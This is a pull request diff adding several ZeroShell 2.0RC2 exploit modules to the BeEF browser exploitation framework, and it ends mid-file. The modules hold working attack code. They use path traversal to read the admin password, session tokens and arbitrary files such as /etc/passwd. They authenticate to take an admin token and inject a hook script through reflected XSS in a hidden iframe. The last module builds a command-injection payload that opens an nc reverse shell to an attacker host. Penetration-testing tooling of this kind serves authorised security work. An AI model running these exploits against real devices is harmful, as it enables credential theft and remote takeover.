### PR TITLE
Adding ZeroShell 2.0RC2 modules to BeEF

### DIFF
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
@@ -1,0 +1,34 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var rhost = '<%= @rhost %>'; 
+	var rport = '<%= @rport %>';
+
+	var uripwd = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
+	var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet";
+	
+	var pwd = "";
+	var token = "";
+
+	beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
+		if(response1.status_code == 200){
+			pwd = response1.response_body.trim();
+			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd);
+			beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
+				if(response2.status_code == 200){
+					token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
+					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token);
+				} else {
+					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.");
+				}
+			});
+		} else {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.");
+		}
+	});
+});
+

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
@@ -14,10 +14,12 @@ beef.execute(function() {
 	var pwd = "";
 	var token = "";
 
+	beef.debug("[ZeroShell_2.0RC2_admin_dynamic_token] Trying to retrieve admin password in plaintext: " + uripwd);
 	beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
 		if(response1.status_code == 200){
 			pwd = response1.response_body.trim();
 			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
+			beef.debug("[ZeroShell_2.0RC2_admin_dynamic_token] Trying to authenticate admin user to gain dynamic token with password: " + pwd);
 			beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
 				if(response2.status_code == 200){
 					token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
@@ -10,24 +10,24 @@ beef.execute(function() {
 
 	var uripwd = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
 	var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet";
-	
+
 	var pwd = "";
 	var token = "";
 
 	beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
 		if(response1.status_code == 200){
 			pwd = response1.response_body.trim();
-			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd);
+			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
 			beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
 				if(response2.status_code == 200){
 					token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
-					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token);
+					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success());
 				} else {
-					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.");
+					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: Second POST request to get admin token failed.", beef.are.status_error());
 				}
 			});
 		} else {
-			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.");
+			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: First GET request to get admin password failed.", beef.are.status_error());
 		}
 	});
 });

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        zeroshell_2_0rc2_admin_dynamic_token:
+            enable: true
+            category: ["Exploits", "ZeroShell"]
+            name: "ZeroShell <= 2.0RC2 Admin Dynamic Token"
+            description: "Attempts to get the admin dynamic token on a ZeroShell <= 2.0RC2 after trying an authentication with admin login and password.<br />This token can be used to get a reverse-shell. <br />This module works only when the hook is on ZeroShell, please migrate to the ZeroShell target before using it.<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
+            authors: ["ycam"]
+            target:
+                working: ["ALL"]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/module.rb
@@ -1,0 +1,19 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Zeroshell_2_0rc2_admin_dynamic_token < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js
@@ -1,0 +1,21 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+
+  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";  
+
+  beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
+    if(response.status_code == 200){
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]");
+    }else{
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
+    }
+  });
+});
+

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js
@@ -5,16 +5,16 @@
 //
 
 beef.execute(function() {
-  var rhost = '<%= @rhost %>'; 
+  var rhost = '<%= @rhost %>';
   var rport = '<%= @rport %>';
 
-  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";  
+  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
 
   beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
     if(response.status_code == 200){
-      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]");
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]", beef.are.status_success());
     }else{
-      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());
     }
   });
 });

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js
@@ -10,6 +10,7 @@ beef.execute(function() {
 
   var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
 
+  beef.debug("[ZeroShell_2.0RC2_admin_password] Trying to retrieve admin password in plaintext: " + uri);
   beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
     if(response.status_code == 200){
       beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]", beef.are.status_success());

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml
@@ -7,7 +7,7 @@ beef:
     module:
         zeroshell_2_0rc2_admin_password:
             enable: true
-	    category: ["Exploits", "ZeroShell"]
+            category: ["Exploits", "ZeroShell"]
             name: "ZeroShell <= 2.0RC2 Admin Password"
             description: "Attempts to get the admin password on a ZeroShell <= 2.0RC2<br />This module works only when the hook is on ZeroShell, please migrate to the ZeroShell target before using it.<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
             authors: ["ycam"]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        zeroshell_2_0rc2_admin_password:
+            enable: true
+	    category: ["Exploits", "ZeroShell"]
+            name: "ZeroShell <= 2.0RC2 Admin Password"
+            description: "Attempts to get the admin password on a ZeroShell <= 2.0RC2<br />This module works only when the hook is on ZeroShell, please migrate to the ZeroShell target before using it.<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
+            authors: ["ycam"]
+            target:
+                working: ["ALL"]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/module.rb
@@ -1,0 +1,19 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Zeroshell_2_0rc2_admin_password < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js
@@ -1,0 +1,21 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+
+  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin";  
+
+  beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
+    if(response.status_code == 200){
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]");
+    }else{
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
+    }
+  });
+});
+

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js
@@ -5,16 +5,16 @@
 //
 
 beef.execute(function() {
-  var rhost = '<%= @rhost %>'; 
+  var rhost = '<%= @rhost %>';
   var rport = '<%= @rport %>';
 
-  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin";  
+  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin";
 
   beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
     if(response.status_code == 200){
-      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]");
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]", beef.are.status_success());
     }else{
-      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());
     }
   });
 });

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js
@@ -10,6 +10,7 @@ beef.execute(function() {
 
   var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin";
 
+  beef.debug("[ZeroShell_2.0RC2_admin_static_token] Trying to retrieve admin static token: " + uri);
   beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
     if(response.status_code == 200){
       beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]", beef.are.status_success());

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        zeroshell_2_0rc2_admin_static_token:
+            enable: true
+            category: ["Exploits", "ZeroShell"]
+            name: "ZeroShell <= 2.0RC2 Admin Static Token"
+            description: "Attempts to get the admin static token on a ZeroShell <= 2.0RC2 from the last token saved on filesystem.<br />This token can be not the latest to use to get a reverse-shell. You should used the dynamic token generated through an authentication.<br />This module works only when the hook is on ZeroShell, please migrate to the ZeroShell target before using it<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
+            authors: ["ycam"]
+            target:
+                working: ["ALL"]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/module.rb
@@ -1,0 +1,19 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Zeroshell_2_0rc2_admin_static_token < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
@@ -11,6 +11,7 @@ beef.execute(function() {
 
   var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;
 
+  beef.debug("[ZeroShell_2.0RC2_file_disclosure] Trying to retrieve local file: " + uri);
   beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
     if(response.status_code == 200){
       beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]", beef.are.status_success());

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
@@ -1,0 +1,22 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var rfile = '<%= @rfile %>';
+
+  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;  
+
+  beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
+    if(response.status_code == 200){
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]");
+    }else{
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
+    }
+  });
+});
+

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
@@ -5,17 +5,17 @@
 //
 
 beef.execute(function() {
-  var rhost = '<%= @rhost %>'; 
+  var rhost = '<%= @rhost %>';
   var rport = '<%= @rport %>';
   var rfile = '<%= @rfile %>';
 
-  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;  
+  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;
 
   beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
     if(response.status_code == 200){
-      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]");
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]", beef.are.status_success());
     }else{
-      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.");
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());
     }
   });
 });

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        zeroshell_2_0rc2_file_disclosure:
+            enable: true
+            category: ["Exploits", "ZeroShell"]
+            name: "ZeroShell <= 2.0RC2 File Disclosure"
+            description: "Attempts to get file content on a ZeroShell <= 2.0RC2.<br />This module works only when the hook is on ZeroShell, please migrate to the ZeroShell target before using it<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
+            authors: ["ycam"]
+            target:
+                working: ["ALL"]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/module.rb
@@ -1,0 +1,20 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Zeroshell_2_0rc2_file_disclosure < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'rfile', 'ui_label' => 'Absolute file path', 'value' => '/etc/passwd' }
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
@@ -1,0 +1,18 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var rhost = '<%= @rhost %>'; 
+	var rport = '<%= @rport %>';
+	var hookuri = '<%= @hookuri %>';
+
+	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hookuri + "'></script>";  
+	
+	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+	iframe_<%= @command_id %>.setAttribute('src', target);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell");
+});

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
@@ -5,7 +5,7 @@
 //
 
 beef.execute(function() {
-	var rhost = '<%= @rhost %>'; 
+	var rhost = '<%= @rhost %>';
 	var rport = '<%= @rport %>';
 	var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
 
@@ -14,5 +14,5 @@ beef.execute(function() {
 	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 	iframe_<%= @command_id %>.setAttribute('src', target);
 
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell");
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=BeEF hook should be sent to ZeroShell", beef.are.status_unknown());
 });

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
@@ -7,10 +7,10 @@
 beef.execute(function() {
 	var rhost = '<%= @rhost %>'; 
 	var rport = '<%= @rport %>';
-	var hookuri = '<%= @hookuri %>';
+	var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
 
-	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hookuri + "'></script>";  
-	
+	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hook + "'></script>";
+
 	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 	iframe_<%= @command_id %>.setAttribute('src', target);
 

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
@@ -11,6 +11,7 @@ beef.execute(function() {
 
 	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hook + "'></script>";
 
+	beef.debug("[ZeroShell_2.0RC2_migrate_hook] Trying to retrieve migrate BeEF hook in ZeroShell context: " + target);
 	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 	iframe_<%= @command_id %>.setAttribute('src', target);
 

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/config.yaml
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/config.yaml
@@ -1,0 +1,15 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        zeroshell_2_0rc2_migrate_hook:
+            enable: true
+            category: ["Exploits", "ZeroShell"]
+            name: "ZeroShell <= 2.0RC2 Migrate Hook"
+            description: "Attempts to put the BeEF's hook on a ZeroShell <= 2.0RC2.<br />Vulnerability found and PoC provided by Yann CAM <a href='http://www.asafety.fr' target='_blank'>@ASafety</a> / <a href='http://www.synetis.com' target='_blank'>Synetis</a>.<br />BeEF module originally created by ycam.<br />For more information refer to <a href='http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt' target='_blank'>http://packetstormsecurity.com/files/122799/zeroshell-execdisclose.txt</a><br />Patched in version 2.0RC3.<br />"
+            authors: ["ycam"]
+            target:
+                working: ["FF"]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb
@@ -7,9 +7,7 @@ class Zeroshell_2_0rc2_migrate_hook < BeEF::Core::Command
 
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-		hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 		return [
-			{ 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri},
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 
 			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }
 		]

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb
@@ -1,0 +1,22 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Zeroshell_2_0rc2_migrate_hook < BeEF::Core::Command
+
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		hookuri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		return [
+			{ 'name' => 'hookuri', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hookuri},
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js
@@ -1,0 +1,47 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var rhost = '<%= @rhost %>'; 
+	var rport = '<%= @rport %>';
+	var lhost = '<%= @lhost %>';
+	var lport = '<%= @lport %>';
+
+	var uripwd = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";
+	var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet";
+
+	var pwd = "";
+	var token = "";
+	var payload = 'beef" localhost && rm -f /tmp/x;mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' > /tmp/x #';
+
+	beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
